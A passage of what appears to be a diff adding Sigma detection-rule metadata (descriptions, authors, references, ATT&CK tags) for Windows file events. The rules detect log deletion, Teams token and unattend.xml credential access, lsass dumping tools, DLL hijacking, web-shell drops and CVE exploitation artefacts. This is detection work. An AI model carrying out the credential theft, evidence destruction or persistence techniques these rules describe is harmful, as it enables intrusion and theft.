Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/26", + "falsepositive": [ + "Possible FP during log rotation" + ], + "filename": "file_delete_win_exchange_powershell_logs.yml", + "level": "high", + "logsource.category": "file_delete", + "logsource.product": "windows", + "refs": [ + "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_exchange_powershell_logs.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070" + ] + }, + "uuid": "a55349d8-9588-4c5a-8e3b-1925fe2a4ffe", + "value": "Exchange PowerShell Cmdlet History Deleted" + }, + { + "description": "A General detection to trigger for the deletion of files by Sysinternals SDelete. It looks for the common name pattern used to rename files.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/05/02", + "falsepositive": [ + "Legitime usage of SDelete" + ], + "filename": "file_delete_win_sysinternals_sdelete_file_deletion.yml", + "level": "medium", + "logsource.category": "file_delete", + "logsource.product": "windows", + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/9", + "https://threathunterplaybook.com/evals/apt29/detections/4.B.4_83D62033-105A-4A02-8B75-DAB52D8D51EC.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.004" + ] + }, + "uuid": "6ddab845-b1b8-49c2-bbf7-1a11967f64bc", + "value": "Sysinternals SDelete File Deletion" + }, + { + "description": "Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in 
CVE-2020-1350 (SigRed)", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/27", + "falsepositive": [ + "Unknown" + ], + "filename": "file_delete_win_unusual_deletion_by_dns_exe.yml", + "level": "high", + "logsource.category": "file_delete", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/unusual-file-modification-by-dns.exe.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_unusual_deletion_by_dns_exe.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1133" + ] + }, + "uuid": "8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0", + "value": "Unusual File Deletion by dns.exe" + }, + { + "description": "Detects the deletion of WebServer access logs which may indicate an attempt to destroy forensic evidence", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/16", + "falsepositive": [ + "During uninstallation of the IIS service", + "During log rotation" + ], + "filename": "file_delete_win_webserver_access_logs_deleted.yml", + "level": "medium", + "logsource.category": "file_delete", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/webserver-access-logs-deleted.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_webserver_access_logs_deleted.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070" + ] + }, + "uuid": "3eb8c339-a765-48cc-a150-4364c04652bf", + "value": "WebServer Access Logs Deleted" + }, + { + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "meta": { + "author": "@SerkinValery", + "creation_date": "2022/09/16", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_access_susp_teams.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + 
"https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/", + "https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_access_susp_teams.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1528" + ] + }, + "uuid": "6902955a-01b7-432c-b32a-6f5f81d8f624", + "value": "Suspicious File Event With Teams Objects" + }, + { + "description": "Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored.\nIf these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/19", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_access_susp_unattend_xml.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_access_susp_unattend_xml.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.001" + ] + }, + "uuid": "1a3d42dd-3763-46b9-8025-b5f17f340dfb", + "value": "Suspicious Unattend.xml File Access" + }, + { + "description": "Detects the use of Advanced IP Scanner. 
Seems to be a popular tool for ransomware groups.", + "meta": { + "author": "@ROxPinTeddy", + "creation_date": "2020/05/12", + "falsepositive": [ + "Legitimate administrative use" + ], + "filename": "file_event_win_advanced_ip_scanner.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/", + "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", + "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc", + "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", + "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_advanced_ip_scanner.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1046" + ] + }, + "uuid": "fed85bf9-e075-4280-9159-fbe8a023d6fa", + "value": "Advanced IP Scanner - File Event" + }, + { + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", + "meta": { + "author": "frack113", + "creation_date": "2022/02/11", + "falsepositive": [ + "Legitimate use" + ], + "filename": "file_event_win_anydesk_artefact.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_anydesk_artefact.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "0b9ad457-2554-44c1-82c2-d56a99c42377", + "value": "Anydesk Temporary Artefact" + }, + { + "description": "Detects anydesk writing binaries files to disk other than \"gcapi.dll\".\nAccording to RedCanary research it's highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll,\nwhich is a legitimate DLL that's part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details)\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/28", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_anydesk_writing_susp_binaries.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/misbehaving-rats/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_anydesk_writing_susp_binaries.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "2d367498-5112-4ae5-a06a-96e7bc33a211", + "value": "Suspicious Binary Writes Via AnyDesk" + }, + { + "description": "A sigma rule detecting an unidetefied attacker who used phishing emails to target high profile orgs on November 2018. 
The Actor shares some TTPs with YYTRIUM/APT29 campaign in 2016.", + "meta": { + "author": "@41thexplorer, Microsoft Defender ATP", + "creation_date": "2018/11/20", + "falsepositive": "No established falsepositives", + "filename": "file_event_win_apt_unidentified_nov_18.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/DrunkBinary/status/1063075530180886529", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_apt_unidentified_nov_18.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218.011" + ] + }, + "uuid": "3a3f81ca-652c-482b-adeb-b1c804727f74", + "value": "Unidentified Attacker November 2018 - File" + }, + { + "description": "Detects default file names outputted by the BloodHound collection tool SharpHound", + "meta": { + "author": "C.J. May", + "creation_date": "2022/08/09", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_bloodhound_collection.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://academy.hackthebox.com/course/preview/active-directory-bloodhound/bloodhound--data-collection", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_bloodhound_collection.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.001", + "attack.t1069.002", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "02773bed-83bf-469f-b7ff-e676e7d78bab", + "value": "BloodHound Collection Files" + }, + { + "description": "Detects suspicious file creation patterns found in logs when CrackMapExec is used", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/12", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_crackmapexec_patterns.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": 
"windows", + "refs": [ + "https://mpgn.gitbook.io/crackmapexec/smb-protocol/obtaining-credentials/dump-lsass", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_crackmapexec_patterns.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "9433ff9c-5d3f-4269-99f8-95fc826ea489", + "value": "CrackMapExec File Creation Patterns" + }, + { + "description": "Detects the creation of system dlls that are not present on the system. Usualy to achieve dll hijacking", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/01", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_create_non_existent_dlls.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://decoded.avast.io/martinchlumecky/png-steganography/", + "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_create_non_existent_dlls.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ] + }, + "uuid": "df6ecb8b-7822-4f4b-b412-08f524b4576c", + "value": "Creation Of Non-Existent DLLs In System Folders" + }, + { + "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/29", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_creation_new_shim_database.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", 
+ "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-2---new-shim-database-files-created-in-the-default-shim-database-directory", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_new_shim_database.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.009" + ] + }, + "uuid": "ee63c85c-6d51-4d12-ad09-04e25877a947", + "value": "New Shim Database Created in the Default Directory" + }, + { + "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/29", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_creation_scr_binary_file.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_scr_binary_file.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.002" + ] + }, + "uuid": "97aa2e88-555c-450d-85a6-229bcd87efb8", + "value": "Suspicious Screensaver Binary File Creation" + }, + { + "description": "Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64...etc).", + "meta": { + "author": "Sander Wiebing, Tim Shelton, Nasreddine Bencherchali", + "creation_date": "2020/05/26", + "falsepositive": [ + "System processes copied outside their default folders for testing purposes", + "Third party software naming their software with the same names as the processes mentioned 
here" + ], + "filename": "file_event_win_creation_system_file.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_system_file.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.005" + ] + }, + "uuid": "d5866ddf-ce8f-4aea-b28e-d96485a20d3d", + "value": "Files With System Process Name In Unsuspected Locations" + }, + { + "description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.\nAdversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/30", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_creation_unquoted_service_path.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.009/T1574.009.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_unquoted_service_path.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.009" + ] + }, + "uuid": "8c3c76ca-8f8b-4b1d-aaf3-81aebcd367c9", + "value": "Creation Exe for Service with Unquoted Path" + }, + { + "description": "Files with well-known filenames (parts of credential dump software or files produced by them) creation", + "meta": { + "author": "Teymur Kheirkhabarov, oscd.community", + "creation_date": "2019/11/01", + "falsepositive": [ + "Legitimate Administrator using tool for password recovery" + ], + "filename": "file_event_win_cred_dump_tools_dropped_files.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": 
"windows", + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.003", + "attack.t1003.004", + "attack.t1003.005" + ] + }, + "uuid": "8fbf3271-1ef6-4e94-8210-03c2317947f6", + "value": "Cred Dump Tools Dropped Files" + }, + { + "description": "Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe", + "meta": { + "author": "Tim Shelton", + "creation_date": "2022/01/10", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_cscript_wscript_dropper.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "WScript or CScript Dropper (cea72823-df4d-4567-950c-0b579eaf0846)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cscript_wscript_dropper.yml" + ], + "tags": "No established tags" + }, + "uuid": "002bdb95-0cf1-46a6-9e08-d38c128a6127", + "value": "WScript or CScript Dropper - File" + }, + { + "description": "When C# is compiled dynamically, a .cmdline file will be created as a part of the process.\nCertain processes are not typically observed compiling C# code, but can do so without touching disk.\nThis can be used to unpack a payload for execution\n", + "meta": { + "author": "frack113", + "creation_date": "2022/01/09", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_csharp_compile_artefact.yml", + "level": "low", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.004/T1027.004.md#atomic-test-2---dynamic-c-compile", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_csharp_compile_artefact.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.004" + ] + }, + "uuid": "e4a74e34-ecde-4aab-b2fb-9112dd01aed0", + "value": "Dynamic C Sharp Compile Artefact" + }, + { + "description": "Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/06/29", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_cve_2021_1675_printspooler.yml", + "level": "critical", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/hhlxf/PrintNightmare", + "https://github.com/afwu/PrintNightmare", + "https://github.com/cube0x0/CVE-2021-1675", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_1675_printspooler.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.resource_development", + "attack.t1587", + "cve.2021.1675" + ] + }, + "uuid": "2131cfb3-8c12-45e8-8fa0-31f5924e9f07", + "value": "CVE-2021-1675 Print Spooler Exploitation Filename Pattern" + }, + { + "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for \ncreation of non-standard files on disk by Exchange Server’s Unified Messaging service\nwhich could indicate dropping web shells or other malicious content\n", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/03/03", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_cve_2021_26858_msexchange.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_26858_msexchange.yml" + ], + "tags": [ + "attack.t1203", + "attack.execution", + "cve.2021.26858" + ] + }, + "uuid": "b06335b3-55ac-4b41-937e-16b7f5d57dfd", + "value": "CVE-2021-26858 Exchange Exploitation" + }, + { + "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", + "meta": { + "author": "Sittikorn S", + "creation_date": "2021/07/16", + "falsepositive": [ + "Unlikely" + ], + "filename": "file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml", + "level": "critical", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/", + "https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1566", + "attack.t1203", + "cve.2021.33771", + "cve.2021.31979" + ] + }, + "uuid": "ad7085ac-92e4-4b76-8ce2-276d2c0e68ef", + "value": "CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum" + }, + { + "description": "Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/11/22", + "falsepositive": [ + "Unknown", + "Possibly some Microsoft Edge upgrades" + ], + "filename": "file_event_win_cve_2021_41379_msi_lpe.yml", + "level": "critical", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/klinix5/InstallerFileTakeOver", + 
"https://www.zerodayinitiative.com/advisories/ZDI-21-1308/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_41379_msi_lpe.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068" + ] + }, + "uuid": "3be82d5d-09fe-4d6a-a275-0d40d234d324", + "value": "InstallerFileTakeOver LPE CVE-2021-41379 File Create Event" + }, + { + "description": "Detects the creation of \"msiexec.exe\" in the \"bin\" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section)", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/06", + "falsepositive": [ + "Unlikely" + ], + "filename": "file_event_win_cve_2021_44077_poc_default_files.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/", + "https://github.com/horizon3ai/CVE-2021-44077/blob/b7a48e25824e8ead95e028475c7fd0e107e6e6bf/exploit.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_44077_poc_default_files.yml" + ], + "tags": [ + "attack.execution", + "cve.2021.44077" + ] + }, + "uuid": "7b501acf-fa98-4272-aa39-194f82edc8a3", + "value": "CVE-2021-44077 POC Default Dropped File" + }, + { + "description": "Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/04/13", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_cve_2022_24527_lpe.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.rapid7.com/blog/post/2022/04/12/cve-2022-24527-microsoft-connected-cache-local-privilege-escalation-fixed/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2022_24527_lpe.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1059.001", + "cve.2022.24527" + ] + }, + "uuid": "e0a41412-c69a-446f-8e6e-0e6d7483dad7", + "value": "CVE-2022-24527 Microsoft Connected Cache LPE" + }, + { + "description": "Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.\nIn it's default mode, it builds a self deleting .bat file which executes malicious command.\nThe detection rule relies on creation of the malicious bat file (debug.bat by default).\n", + "meta": { + "author": "Subhash Popuri (@pbssubhash)", + "creation_date": "2021/08/21", + "falsepositive": [ + "Any powershell script that creates bat files" + ], + "filename": "file_event_win_detect_powerup_dllhijacking.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://powersploit.readthedocs.io/en/latest/Privesc/Write-HijackDll/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_detect_powerup_dllhijacking.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1574.001" + ] + }, + "uuid": "602a1f13-c640-4d73-b053-be9a2fa58b96", + "value": "Powerup Write Hijack DLL" + }, + { + "description": "Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)\nbut with a space in order to trick DLL load search order and perform a \"DLL Search Order Hijacking\" attack\n", + "meta": { + "author": "frack113, Nasreddine Bencherchali", + "creation_date": "2022/07/30", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_dll_sideloading_space_path.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/cyb3rops/status/1552932770464292864", + 
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_dll_sideloading_space_path.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "b6f91281-20aa-446a-b986-38a92813a18f", + "value": "DLL Search Order Hijackig Via Additional Space in Path" + }, + { + "description": "Detects creation of a file named \"ErrorHandler.cmd\" in the \"C:\\WINDOWS\\Setup\\Scripts\\\" directory which could be used as a method of persistence\nThe content of C:\\WINDOWS\\Setup\\Scripts\\ErrorHandler.cmd is read whenever some tools under C:\\WINDOWS\\System32\\oobe\\ (e.g. Setup.exe) fail to run for any reason.\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/09", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_error_handler_cmd_persistence.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.hexacorn.com/blog/2022/01/16/beyond-good-ol-run-key-part-135/", + "https://github.com/last-byte/PersistenceSniper", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_error_handler_cmd_persistence.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "15904280-565c-4b73-9303-3291f964e7f9", + "value": "Persistence Via ErrorHandler.Cmd" + }, + { + "description": "Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder", + "meta": { + "author": "Florian Roth (rule), MSTI (query, idea)", + "creation_date": "2022/10/01", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_exchange_webshell_drop.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + 
"https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", + "https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html", + "https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_exchange_webshell_drop.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ] + }, + "uuid": "bd1212e5-78da-431e-95fa-c58e3237a8e6", + "value": "Suspicious ASPX File Drop by Exchange" + }, + { + "description": "Detects suspicious file type dropped by an Exchange component in IIS", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/10/04", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_exchange_webshell_drop_suspicious.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", + "https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html", + "https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_exchange_webshell_drop_suspicious.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1190", + "attack.initial_access", + "attack.t1505.003" + ] + }, + "uuid": "6b269392-9eba-40b5-acb6-55c882b20ba6", + "value": "Suspicious File Drop by Exchange" + }, + { + "description": "Detects default lsass dump filename from SafetyKatz", + "meta": { + "author": "Markus Neis", + 
"creation_date": "2018/07/24", + "falsepositive": [ + "Rare legitimate files with similar filename structure" + ], + "filename": "file_event_win_ghostpack_safetykatz.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/GhostPack/SafetyKatz", + "https://github.com/GhostPack/SafetyKatz/blob/715b311f76eb3a4c8d00a1bd29c6cd1899e450b7/SafetyKatz/Program.cs#L63", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ghostpack_safetykatz.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "e074832a-eada-4fd7-94a1-10642b130e16", + "value": "SafetyKatz Default Dump Filename" + }, + { + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", + "meta": { + "author": "frack113", + "creation_date": "2022/02/13", + "falsepositive": [ + "Legitimate use" + ], + "filename": "file_event_win_gotoopener_artefact.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_gotoopener_artefact.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "5d756aee-ad3e-4306-ad95-cb1abec48de2", + "value": "GoToAssist Temporary Installation Artefact" + }, + { + "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/02/04", + "falsepositive": [ + "Very unlikely" + ], + "filename": "file_event_win_hack_dumpert.yml", + "level": "critical", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/outflanknl/Dumpert", + "https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hack_dumpert.yml" + ], + 